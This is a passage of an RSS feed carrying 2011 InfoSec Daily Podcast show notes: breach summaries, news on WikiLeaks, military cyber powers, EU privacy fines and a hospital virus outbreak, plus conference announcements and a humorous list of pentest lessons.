	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">2. The Breach Victim: Tricare/SAIC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Assets Stolen/Affected: Protected health information from 5.1 million patients of U.S. military hospitals and clinics.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">3. The Breach Victim: Sutter Physicians Services and Sutter Medical Foundation</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Assets Stolen/Affected: Personally identifiable information of 3.3 million patients supported by Sutter Physicians Services and medical information of another 934,000 Sutter Medical Foundation patients.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">4. The Breach Victim: SK Communications</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Assets Stolen/Affected: Thirty-five million names, email addresses, phone numbers, and resident registration numbers of social media users at South Korean sites Cyworld and Nate.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">5. The Breach Victim: Valve, Inc.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Assets Stolen/Affected: Personally identifiable information for 35 million users of Valve&#39;s online gaming site.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://abcnews.go.com/Technology/wireStory/us-set-soldier-leaks-targets-assange-15162032"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://abcnews.go.com/Technology/wireStory/us-set-soldier-leaks-targets-assange-15162032</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As the suspected source for the biggest intelligence leak in American history faces his first hearing Friday, U.S. prosecutors have their eye on another prize: the man who disclosed the documents to the world.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When WikiLeaks&#39; spectacular disclosures of U.S. secrets exploded onto the scene last year, much of Washington&#39;s anger coalesced around Julian Assange, the silver-haired globe-trotting figure whose outspoken defiance of the Pentagon and the State Department riled politicians on both sides of the aisle. Pfc. Bradley Manning, long under lock and key, hasn&#39;t attracted the same level of ire.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The pair&#39;s fates have been intertwined, however, even if the Australian-born computer hacker says he didn&#39;t know the private&#39;s name until after news of his arrest emerged in June 2010. Manning&#39;s alleged disclosures put Assange at the epicenter of a diplomatic earthquake.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Assange in turn has worked energetically to drum up support for the imprisoned soldier &mdash; all while emphasizing that the way his anti-secrecy site was set up meant he could not be sure if Manning was his source.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">U.S. investigators have been scrutinizing links between the two as they explore the possibility of charging the Australian with serious crimes under U.S. law. A Virginia grand jury is studying evidence that might link Assange to Manning, but no action has yet been taken.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">: </span><a href="http://www.wired.com/threatlevel/2011/12/internet-war-2/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2011/12/internet-war-2/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The House and Senate agreed to give the U.S. military the power to conduct &ldquo;offensive&rdquo; strikes online &mdash; including clandestine attacks, via a little-noticed provision in the military&rsquo;s 2012 funding bill.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The power, which was included in the House version but not the Senate version, was included in the final &ldquo;reconciled&rdquo; bill that is all but guaranteed to pass into law.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Congress affirms that the Department of Defense has the capability, and upon direction by the President may conduct offensive operations in cyberspace to defend our Nation, Allies and interests, subject to&ndash; (1) the policy principles and legal regimes that the Department follows for kinetic capabilities, including the law of armed conflict; and (2) the War Powers Resolution (50 U.S.C. 1541 et seq.).</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While &ldquo;offensive&rdquo; action isn&rsquo;t defined, that&rsquo;s likely to include things like unleashing a worm like the Stuxnet worm that damaged Iran&rsquo;s nuclear centrifuges, hacking into another country&rsquo;s power grid to bring it down, disabling websites via denial-of-service attacks, or as the CIA has already done with some collateral damage, hacking into a forum where would-be terrorists meet in order to permanently disable it.</span></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.ft.com/cms/s/2/bf962998-1d01-11e1-a26a-00144feabdc0.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ft.com/cms/s/2/bf962998-1d01-11e1-a26a-00144feabdc0.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Businesses breaching European Union privacy rules will face fines of up to 5 per cent of their global turnover under sweeping proposals to be unveiled next month.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In the first significant update of data protection legislation since 1995, companies found to have mishandled any personal data they hold &ndash; be it of their customers, suppliers or their own employees &ndash; will face the highest levels of fines, which could extend to billions of euros for large multinationals.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The measures are being finalised within the European Commission. They will have to be approved by national governments, some of which &ndash; especially Germany &ndash; will be reluctant to lose oversight on privacy matters to Brussels. The process is likely to take at least two years, with another two before the measures come into effect.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The proposals would bolster significantly the EU&rsquo;s powers on combating data protection breaches, such as when companies sell customer data to third parties without authorisation or fail to adequately protect information held by social networks and &ldquo;cloud computing&rdquo; services.</span></p>
<p>
	&nbsp;</p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-547-naughty-french-visa-ellen-scam-big-5-manning/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3279/0/infosec-daily-podcast-episode-547.mp3" length="19752269" type="audio/mpeg" />
		<itunes:duration>0:41:06</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 547 for December 15, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Br[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 547 for December 15, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Adrian Crenshaw, Karthik Rangarajan, and Varun Sharma.
&#160;
Announcements:
Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	CampusCon 2012
	When: January 21, 2012
	Where: WIT {Waterford Institute of Technology} Sports &#8211; Waterford, Ireland
	http://campuscon.hackingwit.com
	(from Baconzombie)
	SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style
	When: Starts January 24, 2012
	Where: Atlanta, GA
	Discount Code:
	http://www.sans.org/mentor/details.php?nid=25484
	ShmooCon 2012
	When: January 27th-29th, 2012
	Where: Washington Hilton Hotel, Washington, DC
	http://www.shmoocon.org
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	http://aide.marshall.edu
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;&#160;http://torrentfreak.com/french-presidents-residence-busted-for-bittorrent-piracy-111215/
	Nicholas Sarkozy, the president of France and one of the most powerful men of Europe, was busted today after journalists from a French news site, armed with &#201;lys&#233;e Palace IPs, took a peak to see what has been downloaded from the president&#8217;s residence. 
	If the three-strike piracy law adopted by French authorities early this year would be applied, the Palace would be left without an Internetconnection for about two months. 
	A total of six downloads that can be considered copyright infringement were recorded by the new BitTorrent-use tracking service as coming from Sarkozy&#8217;s place, reports TorrentFreak.
	Tower Heist, Arthur Christmas and a high quality version of a BeachBoys album were among the pirated materials.
	Now, even though the YouHaveDownloaded website&#8217;s owners said that their service cannot handle Dynamic IP&#8217;s, making the pirate-appointing business less accurate, a quick look at the IP addresses provided by Nicolas Perrier of Nikopik using the Whois service from DomainTools reveals that indeed the addresses belong to &#8220;Presidence de la Republique&#8221;.
	Since the controversial website was launched, a lot of organizations that support anti-piracy movements were caught with their pants down. Yesterday we say how even Sony, Universal and Fox employees spend a lot of time downloading content from torrent sites.
	&#8230;
	Source: &#160;http://www.pcadvisor.co.uk/news/security/3325419/visa-investigates-security-breach-at-european-payment-processor
	Visa is investigating a potential security breach at an European payment processor that might have affected cardholders in eastern Europe.
	&#34;Visa Europe has been informed of a potential data security breach at a European processor and an investigation is underway,&#34; the company said[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 546 &#8211; &#8220;Pentest Lessons&#8221;, Back to Paper, Social Media Refuseniks, Youhavedownloaded, SCADA, Gene Simmons DDoS</title>
		<link>http://www.isdpodcast.com/episode-546-pentest-lessons-back-to-paper-social-media-refuseniks-youhavedownloaded-scada-gene-simmons-ddos</link>
		<comments>http://www.isdpodcast.com/episode-546-pentest-lessons-back-to-paper-social-media-refuseniks-youhavedownloaded-scada-gene-simmons-ddos#comments</comments>
		<pubDate>Thu, 15 Dec 2011 01:48:31 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3274</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 546 for December 14, 2011. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski. Announcements: Brad Smith (theNurse) We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had [...]]]></description>
			<content:encoded><![CDATA[<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 546 for December 14, 2011. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, Geordy Rostad, and Keith Pachulski.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><br />
	Announcements:</span></p>
<p><span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital for almost a month.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">SANS Mentoring: Security 401 SANS Security Essentials Bootcamp Style</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Starts January 24, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Atlanta, GA</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Discount Code:</span><br />
	<a href="http://www.sans.org/mentor/details.php?nid=25484"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=25484</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:13px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:13px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 1pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">&ldquo;Pentest Lessons&quot;</span></p>
<p>
	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 1. Boris needs his coffee before any attempts at humor can be made.</span><br />
	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 2. &ldquo;As long as the perimeter is secure, nothing else matters.&rdquo;</span><br />
	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 3. Never say &ldquo;Oh, shit!&rdquo; or &ldquo;God Damn It!&rdquo; on a customer location</span><br />
	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 4. &ldquo;How did you bypass SSL like that?&rdquo;</span><br />
	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 5. &nbsp;When you pop a box during an internal assessment, don&rsquo;t shout out &ldquo;I own that shiz&rdquo;</span><br />
	<span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 6. &ldquo;Don&rsquo;t ever include anything in report that wasn&rsquo;t part of scope&rdquo;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 7. If you get detained/arrested during an engagement, never say &ldquo;Is that tazer real?&rdquo;</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 8. If you can&rsquo;t make it through the door on your own a Latina always works</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 9. Don&rsquo;t click suspicious links on client owned hardware or machines with client data on it</span></p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Lesson 10. Don&rsquo;t add Linkedin connections based on you&rsquo;re friends acceptance.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:13px;font-family:Verdana;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.wsbtv.com/news/news/local/hospital-diverting-trauma-cases-due-computer-probl/nFyYY/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wsbtv.com/news/news/local/hospital-diverting-trauma-cases-due-computer-probl/nFyYY/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The Gwinnett Medical Center in Lawrenceville, Georgia, suffered a serious computer virus infection that temporarily disabled their services, the medical facility being able to provide help only to those who had extreme emergencies.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">WSBTV reports that the virus affected the hospital&rsquo;s networks, employees being forced to turn back to the good old fashioned paper and pen to perform their tasks.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We&#39;ve had a virus to interrupt our system within our hospital,&rdquo; revealed a Gwinnett Medical Center representative. &ldquo;It&#39;s not affecting patient care in any way, shape or form.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Fortunately, only the network connections were affected by the virus that allegedly quickly spread from a device to the other. The databases that contain medical records and other patient information were not harmed.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">On Wednesday, the facility declared &ldquo;total diversion,&rdquo; which resulted in the fact that most of the patients had to be redirected to other hospitals. Two days later the status changed to &ldquo;trauma diversion&rdquo; and by Saturday, the online systems were back on track.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;We actually have some of our IT vendor partners that are on site with us that have actually been here since Wednesday,&rdquo; the representative said. &ldquo;We&#39;ve also got internal teams that are trying to identify the virus issues.&rdquo;</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The source of the virus is currently unknown, but it shouldn&rsquo;t surprise anyone if one of the employees opened a malicious email that either warned of a security update or maybe even some fabulous offer that just couldn&rsquo;t have been turned down.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.theregister.co.uk/2011/12/14/nhs_facebook_twitter/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.theregister.co.uk/2011/12/14/nhs_facebook_twitter/</span></a><br />
